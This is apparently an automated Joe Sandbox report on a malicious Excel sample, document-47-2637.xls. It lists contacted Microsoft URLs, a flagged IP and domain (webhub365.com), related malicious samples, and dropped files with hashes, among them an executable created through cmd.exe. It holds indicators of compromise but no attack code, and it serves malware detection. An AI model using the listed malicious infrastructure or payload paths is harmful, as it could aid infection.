                                                                                    https://incidents.diagnostics.office.com6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                                                      high
                                                                                      https://clients.config.office.net/user/v1.0/ios6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                                                        high
                                                                                        https://insertmedia.bing.office.net/odc/insertmedia6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                                                          high
                                                                                          https://o365auditrealtimeingestion.manage.office.com6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                                                            high
                                                                                            https://outlook.office365.com/api/v1.0/me/Activities6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                                                              high
                                                                                              https://api.office.net6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                                                                high
                                                                                                https://incidents.diagnosticssdf.office.com6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                                                                  high
                                                                                                  https://asgsmsproxyapi.azurewebsites.net/6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                                                                  • 0%, Virustotal, Browse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://clients.config.office.net/user/v1.0/android/policies6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                                                                    high
                                                                                                    https://entitlement.diagnostics.office.com6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                                                                      high
                                                                                                      https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                                                                        high
                                                                                                        https://outlook.office.com/6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                                                                          high
                                                                                                          https://storage.live.com/clientlogs/uploadlocation6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                                                                            high
                                                                                                            https://templatelogging.office.com/client/log6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                                                                              high
                                                                                                              https://outlook.office365.com/6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                                                                                high
                                                                                                                https://webshell.suite.office.com6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                                                                                  high
                                                                                                                  https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                                                                                    high
                                                                                                                    https://management.azure.com/6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                                                                                      high
                                                                                                                      https://login.windows.net/common/oauth2/authorize6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                                                                                        high
                                                                                                                        https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        https://graph.windows.net/6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                                                                                          high
                                                                                                                          https://api.powerbi.com/beta/myorg/imports6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                                                                                            high
                                                                                                                            https://devnull.onenote.com6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                                                                                              high
                                                                                                                              https://ncus.pagecontentsync.6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                                                                                                high
                                                                                                                                https://messaging.office.com/6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://augloop.office.com/v26529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://skyapi.live.net/Activity/6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://clients.config.office.net/user/v1.0/mac6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://dataservice.o365filtering.com6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://api.cortana.ai6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://onedrive.live.com6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://ovisualuiapp.azurewebsites.net/pbiagave/6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            https://visio.uservoice.com/forums/368202-visio-on-devices6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://directory.services.6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://login.windows-ppe.net/common/oauth2/authorize6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://staging.cortana.ai6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://loki.delve.office.com/api/v1/configuration/officewin32/6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                                                                                                                  high

                                                                                                                                                  Contacted IPs

                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                  Public

                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                  198.244.146.96
                                                                                                                                                  webhub365.comUnited States
                                                                                                                                                  18630RIDLEYSD-NETUSfalse

                                                                                                                                                  General Information

                                                                                                                                                  Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                                  Analysis ID:432941
                                                                                                                                                  Start date:11.06.2021
                                                                                                                                                  Start time:00:05:31
                                                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                                                  Overall analysis duration:0h 4m 54s
                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                  Report type:light
                                                                                                                                                  Sample file name:document-47-2637.xls
                                                                                                                                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                  Run name:Potential for more IOCs and behavior
                                                                                                                                                  Number of analysed new started processes analysed:26
                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                  Technologies:
                                                                                                                                                  • HCA enabled
                                                                                                                                                  • EGA enabled
                                                                                                                                                  • HDC enabled
                                                                                                                                                  • AMSI enabled
                                                                                                                                                  Analysis Mode:default
                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                  Detection:MAL
                                                                                                                                                  Classification:mal84.bank.expl.evad.winXLS@6/8@1/1
                                                                                                                                                  EGA Information:
                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                  HDC Information:
                                                                                                                                                  • Successful, ratio: 100% (good quality ratio 86.9%)
                                                                                                                                                  • Quality average: 69.9%
                                                                                                                                                  • Quality standard deviation: 34%
                                                                                                                                                  HCA Information:Failed
                                                                                                                                                  Cookbook Comments:
                                                                                                                                                  • Adjust boot time
                                                                                                                                                  • Enable AMSI
                                                                                                                                                  • Found application associated with file extension: .xls
                                                                                                                                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                  • Attach to Office via COM
                                                                                                                                                  • Scroll down
                                                                                                                                                  • Close Viewer
                                                                                                                                                  Warnings:
                                                                                                                                                  Show All
                                                                                                                                                  • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 13.64.90.137, 104.42.151.234, 104.43.139.144, 52.109.88.177, 52.109.88.39, 52.109.12.21, 20.82.209.183, 23.218.208.56, 20.54.26.129, 92.122.213.247, 92.122.213.194, 20.50.102.62
                                                                                                                                                  • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, www-bing-com.dual-a-0001.a-msedge.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, www.bing.com, skypedataprdcolwus17.cloudapp.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, dual-a-0001.a-msedge.net, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, europe.configsvc1.live.com.akadns.net
                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information

                                                                                                                                                  Simulations

                                                                                                                                                  Behavior and APIs

                                                                                                                                                  No simulations

                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                  IPs

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  198.244.146.96document-47-2637.xlsGet hashmaliciousBrowse
                                                                                                                                                    document-47-2637.xlsGet hashmaliciousBrowse
                                                                                                                                                      document-47-2637.xlsGet hashmaliciousBrowse

                                                                                                                                                        Domains

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                        webhub365.comdocument-47-2637.xlsGet hashmaliciousBrowse
                                                                                                                                                        • 198.244.146.96
                                                                                                                                                        document-47-2637.xlsGet hashmaliciousBrowse
                                                                                                                                                        • 198.244.146.96

                                                                                                                                                        ASN

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                        RIDLEYSD-NETUSdocument-47-2637.xlsGet hashmaliciousBrowse
                                                                                                                                                        • 198.244.146.96
                                                                                                                                                        document-47-2637.xlsGet hashmaliciousBrowse
                                                                                                                                                        • 198.244.146.96
                                                                                                                                                        document-47-2637.xlsGet hashmaliciousBrowse
                                                                                                                                                        • 198.244.146.96

                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                        37f463bf4616ecd445d4a1937da06e19document-47-2637.xlsGet hashmaliciousBrowse
                                                                                                                                                        • 198.244.146.96
                                                                                                                                                        Fax_Doc#01_5.htmlGet hashmaliciousBrowse
                                                                                                                                                        • 198.244.146.96
                                                                                                                                                        wa71myDkbQ.exeGet hashmaliciousBrowse
                                                                                                                                                        • 198.244.146.96
                                                                                                                                                        Current-Status-062021-81197.xlsbGet hashmaliciousBrowse
                                                                                                                                                        • 198.244.146.96
                                                                                                                                                        logo.png.exeGet hashmaliciousBrowse
                                                                                                                                                        • 198.244.146.96
                                                                                                                                                        3F97s4aQjB.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 198.244.146.96
                                                                                                                                                        WcCEh3daIE.xlsGet hashmaliciousBrowse
                                                                                                                                                        • 198.244.146.96
                                                                                                                                                        ATT00005.htmGet hashmaliciousBrowse
                                                                                                                                                        • 198.244.146.96
                                                                                                                                                        kxjeAvsg1v.exeGet hashmaliciousBrowse
                                                                                                                                                        • 198.244.146.96
                                                                                                                                                        VSA75RUmYZ.exeGet hashmaliciousBrowse
                                                                                                                                                        • 198.244.146.96
                                                                                                                                                        iX22xMeXIc.exeGet hashmaliciousBrowse
                                                                                                                                                        • 198.244.146.96
                                                                                                                                                        QWkt5w3cO2.exeGet hashmaliciousBrowse
                                                                                                                                                        • 198.244.146.96
                                                                                                                                                        #U260e#Ufe0f Zeppelin.com AudioMessage_259-55.HTMGet hashmaliciousBrowse
                                                                                                                                                        • 198.244.146.96
                                                                                                                                                        vTtOheCXBQ.exeGet hashmaliciousBrowse
                                                                                                                                                        • 198.244.146.96
                                                                                                                                                        6b6zVfqxbk.xlsbGet hashmaliciousBrowse
                                                                                                                                                        • 198.244.146.96
                                                                                                                                                        Check 57549.HtmlGet hashmaliciousBrowse
                                                                                                                                                        • 198.244.146.96
                                                                                                                                                        audit-78958169.xlsbGet hashmaliciousBrowse
                                                                                                                                                        • 198.244.146.96
                                                                                                                                                        Docc.htmlGet hashmaliciousBrowse
                                                                                                                                                        • 198.244.146.96
                                                                                                                                                        askinstall39.exeGet hashmaliciousBrowse
                                                                                                                                                        • 198.244.146.96
                                                                                                                                                        Lista e porosive.exeGet hashmaliciousBrowse
                                                                                                                                                        • 198.244.146.96

                                                                                                                                                        Dropped Files

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                        C:\aZ8ThU0Y\ERdZMUem\nnAzot.exedocument-47-2637.xlsGet hashmaliciousBrowse
                                                                                                                                                          document-37-1849.xlsGet hashmaliciousBrowse

                                                                                                                                                            Created / dropped Files

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\6529B5B3-6D5E-4521-86C2-74637D63C046
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                            File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):134922
                                                                                                                                                            Entropy (8bit):5.369096977426818
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:VcQIKNEeBXA3gBwlpQ9DQW+z7534ZliKWXboOilX5ENLWME9:hEQ9DQW+ziXOe
                                                                                                                                                            MD5:EFDCCF0E3988CC8522DA896FF634963A
                                                                                                                                                            SHA1:C14FFFC27E2118EE983A089C4288A894336C558B
                                                                                                                                                            SHA-256:A773943B455B0B061DB5E88D3E99F7C2982931ADF334514C4CD564403A3A40B1
                                                                                                                                                            SHA-512:B2A94CD75B635A8563D6D572093EE4E85AF35A7F5D21509C8F02C39F15084A4CC5191E51FA8B712FAFF63259B6740F40C463B4C23783CBDC3B6D6FACEAEBD8D4
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-06-10T22:06:24">.. Build: 16.0.14209.30527-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\D8810000
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):68601
                                                                                                                                                            Entropy (8bit):7.609519686020766
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:5XWvegIg9kOKLUwxZi4IB5/vAVk/ViuHpc2HoM3DFZXHHHHHHHHHLGAX4MOw+j85:ekNLPHqvAk/Vi6+YDT7Hbc8hxCCVljJ
                                                                                                                                                            MD5:8ADAF6B90235725A61872A8DB4229AB4
                                                                                                                                                            SHA1:0D3F245BA39D7F1909A6BECEA21D444DDCC2992C
                                                                                                                                                            SHA-256:EF4D3E61002EE375D7DA35AC750AE8473E476DEE0CBBDD779208FA3A1079D8F4
                                                                                                                                                            SHA-512:ED05561C99B4CA1C28C8FBF8C2E7EE58DF41CC180A979CC9A7431B3A8004549F379F9F569BB3A1ACAED463AD6CA4AA6665A028555DFB21384FF67F42ABA078D8
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview: .TKo.0.....0t.l.;.....>.].u?...X.^..6....4} .W..[6.=H.....m.1......D4.U../z....)...5...k$q>.v2.[G...z1...IIj@....#..d.L..A-a...dr&U..}ns....%.....j.7N.E\..b..h..BP.r/&............^.p.n]u..{h0...u._.D.z+....r&.....o..u...)..}...0Iq..B...;.*.+...9..8<.T.$...?$..Y..s.P.....:..AW2g..I]....?kd..+zD&.CY..gZiF.).-...uC:.<@B.''n./7.{.N.T,.....o....m.M!.......K..t...S6...}..S..?....7.z....t........PK..........!...<............[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................MO.0...H.......BKwAH.
                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 16:19:49 2019, mtime=Fri Jun 11 06:06:25 2021, atime=Fri Jun 11 06:06:25 2021, length=8192, window=hide
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):904
                                                                                                                                                            Entropy (8bit):4.657346264107908
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:8dDsXUxvuElPCH2AQaYWzhO8+WrjAZ/2bDhLLC5Lu4t2Y+xIBjKZm:8FaQSAZiDM87aB6m
                                                                                                                                                            MD5:C17835DE1533EE31CF716FFCD2BEAC22
                                                                                                                                                            SHA1:2F8F01FF8FF43311472B475398FC9E1DFED3EC53
                                                                                                                                                            SHA-256:9CD9102A634AD9C62E44C783A47E437E2D8C19AC07DE5F2A173D320D6643BC84
                                                                                                                                                            SHA-512:054265AC8BBD231F4D08D1DE85CBE9DD90FFBD76A9890FA421C9D947B8714BA525CEBAABA893CA0015BBAC988D81061CAEAC938BA0945ACD2E7130734B217829
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview: L..................F........N....-...e#K.^....!K.^... ......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R.8....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qwx..user.<.......Ny..R.8.....S......................;.h.a.r.d.z.....~.1......R.8..Desktop.h.......Ny..R.8.....Y..............>........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......639509...........!a..%.H.VZAj...4.4...........-..!a..%.H.VZAj...4.4...........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\document-47-2637.xls.LNK
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:43 2020, mtime=Fri Jun 11 06:06:26 2021, atime=Fri Jun 11 06:06:26 2021, length=92672, window=hide
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2170
                                                                                                                                                            Entropy (8bit):4.7200190235862465
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:8WaQPgNAoF1DhV7aB6myWaQPgNAoF1DhV7aB6m:8WYGoFr4B6pWYGoFr4B6
                                                                                                                                                            MD5:55EB1B86A51BA808580E7D8F6B69C6F8
                                                                                                                                                            SHA1:8060B4A00590F6720A2E3DBCF32DB7CC1E6D4572
                                                                                                                                                            SHA-256:3771E847369345DE9B338EAEB13AD78BBDAE9734AD28A411086E72AA174FF41B
                                                                                                                                                            SHA-512:F525EB9D1417779410856C84CBBDD19D68B909754E088105B7660671B35C30EF65C1FEF98F6FF2FDAFBE3C35648346C484E40B316EA09C87CB383EA37514D8B3
                                                                                                                                                            Malicious:true
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview: L..................F.... .......:...V.1K.^..V.1K.^...j...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R.8....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qwx..user.<.......Ny..R.8.....S......................;.h.a.r.d.z.....~.1.....>Qyx..Desktop.h.......Ny..R.8.....Y..............>.........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....v.2..h...R.8 .DOCUME~1.XLS..Z......>Qvx.R.8....h......................1..d.o.c.u.m.e.n.t.-.4.7.-.2.6.3.7...x.l.s.......Z...............-.......Y...........>.S......C:\Users\user\Desktop\document-47-2637.xls..+.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.c.u.m.e.n.t.-.4.7.-.2.6.3.7...x.l.s.........:..,.LB.)...As...`.......X.......639509...........!a..%.H.VZAj...Q..-.........-..!a..%.H.VZAj...Q..-.........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.
                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):113
                                                                                                                                                            Entropy (8bit):4.7740406620224185
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:oyBVomMY9LRkKSpmUZELRkKSpmUmMY9LRkKSpmUv:dj6Y9LaJpbELaJphY9LaJpl
                                                                                                                                                            MD5:76DDF8AD6F08D42714419B5F042F0B0D
                                                                                                                                                            SHA1:FBDDF758BD78A5D4F9DD2FA75CF7C243AF7B903C
                                                                                                                                                            SHA-256:BCF2EA38D3219270EE2D8295AE7059C1AEB42B3486DB50686CA6E83F6D8DF13E
                                                                                                                                                            SHA-512:1BC7D6A190905BA1A79374289431AB54512D654E70CA14EB0CB6AD0CADCA030D0502B7E9523ECF2D3765C46199EC1D44178FD9B4A2A628F4A9D466DEFEB0A177
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview: Desktop.LNK=0..[xls]..document-47-2637.xls.LNK=0..document-47-2637.xls.LNK=0..[xls]..document-47-2637.xls.LNK=0..
                                                                                                                                                            C:\Users\user\Desktop\56620000
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                            File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                            Category:modified
                                                                                                                                                            Size (bytes):99740
                                                                                                                                                            Entropy (8bit):7.930716567182298
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3072:4QmPGcKEHjaHavc2O9oC/ZgqvE4W56IxcVTKHQmPGwKEHjz:4ocKEjaHy4o0gqQ56IkKHowKEjz
                                                                                                                                                            MD5:A128138DAF2B0EF988191575CC89C60E
                                                                                                                                                            SHA1:94919944D17E1A500D6B4D7958DEC55F8C295053
                                                                                                                                                            SHA-256:9257667CD47E559630286BFE64552BDE4A44AF3CB45392F501394832893F5B9F
                                                                                                                                                            SHA-512:B73B1DBD9520BC738BB10DB58AC5868315C56F79C09DE68BE95E8A41A559D906C85DD3B96E554028C29756BCC8E5FA5D057BACF446B0C1847BE504677B4C2F64
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview: ........T8........../.........4]..2..'A.z.R.j^..,U..x..O..U...0.......P..).........T8........../.6.......4]..2..'A.z.R.j^..,U..x..O..U...0.......P..)............\....\.p.g..EPLp...gE..............P.2n..&R..uYAA.lT`....~.|..!..v......#H..u0L....T.E.$...NS!..a.l...L.....%.B.....a.........=......b.....}.....a..........|.........j.=........@{~.H.I.B..@...S.....xn"...............#......1......E.44{[.fTJ.2...... ..a..i71....Z3=...1zX.._.%........A...X_1....-!.#.......A...N..........(1...R.vUD. >...3.R.......`.....1....f..F...R.....?.t..@E.p....a1.*..z.j@..>z.f+.Q....$...A..SEFFr.....a..D.1...`..H..............[...Qe.k..1....Z..>T^.p!.u[.n....|:.*......1....]l...T\.9..M...r:...8s.....1......t.[.t...DH.....1W.UNT...&.r1........G.=.....mDz...J....g1....*..]~.j-.#........iug.ix.hE1...;..yj(f#.)..N.6]%8........l1.........t.0G..d....<.!.r".=.v5E1...rQ.8....O..i.jf...y.....m..c1...Wn.8.f..1...Q......A\.P..UH+1.......>.3.....G..3A.zX$..]...1...
                                                                                                                                                            C:\Users\user\Desktop\99810000
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                            File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):117445
                                                                                                                                                            Entropy (8bit):7.926699765404259
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3072:vida2N1S7U7VGSwX+B4TJ2FrKmNYfjeXyQfjeXQidaJL:vidHvI5lN2VKaYfjeCQfjegidW
                                                                                                                                                            MD5:85DA544B4D80414FFA7A91346A2DD333
                                                                                                                                                            SHA1:7AFEF0F5DBF3476F1FA06ED5490125D87D8F3FB2
                                                                                                                                                            SHA-256:A083B8DADA5B4AA41D290E7796E6F3AE2AE77340AC9295D74182041B5A9F92B6
                                                                                                                                                            SHA-512:4685FA2C5AAF91B1F276267ED6BD500C628F0A6B71422480184BDBFB80978B7DC7F6499CDC7E756D2A7E471E947AD6198A712AC2B0285794CBC5F75F0BAF07BA
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview: ........T8........../..........%......no...y$iS._..+.i4._.\7..g..8.".......q........T8........../.6........%......no...y$iS._..+.i4._.\7..g..8.".......q...........0....\.p.d+..@c.g;....._..G[*)..5j.....+.Q..H2c.......'i.w.. .Z....5....4*.'...C.Y..).b.8>.n.V!.;..ZY,....e|.a..q..B...G.a.........=.....q..........h...../.................W=.....a.OR....~.7B.B.%@....2......"...<m...............Q1...1..). U.PZ..U..I.{...|t....1...v.B..|).&8..x`...s7.......1... f=....N&dF./.Gu..@a.J.g%.j7..1.....y....<.o#S.`<......`.P+.....1...0.....b.....}.e.(....5<.n....71.*.\..L...j7..VN..h..,=.}..*c..W......A.O...1.....sto...R&..=><..qEZ.o....xE..1......i.....*a..B.15J ......u&...1...;".*.b.sI.LTw.M....h.v...H..1......|.....5M.}...T....*.....1.......8...QsDq.>(..r..@.:P<BL1...48..,...2`Oee7z........cC..g.1...[.f..z.3*...'.P..>......yP/1....Z.!.1=.y!h.Ye.n6}...Q.H....c1.....Y.-..k".)\B_.{...j9..C.1.... .........2.v..q.....Mu".m1....u..P....x#.%,VM..Z...f.....W1...
                                                                                                                                                            C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe
                                                                                                                                                            Process:C:\Windows\SysWOW64\cmd.exe
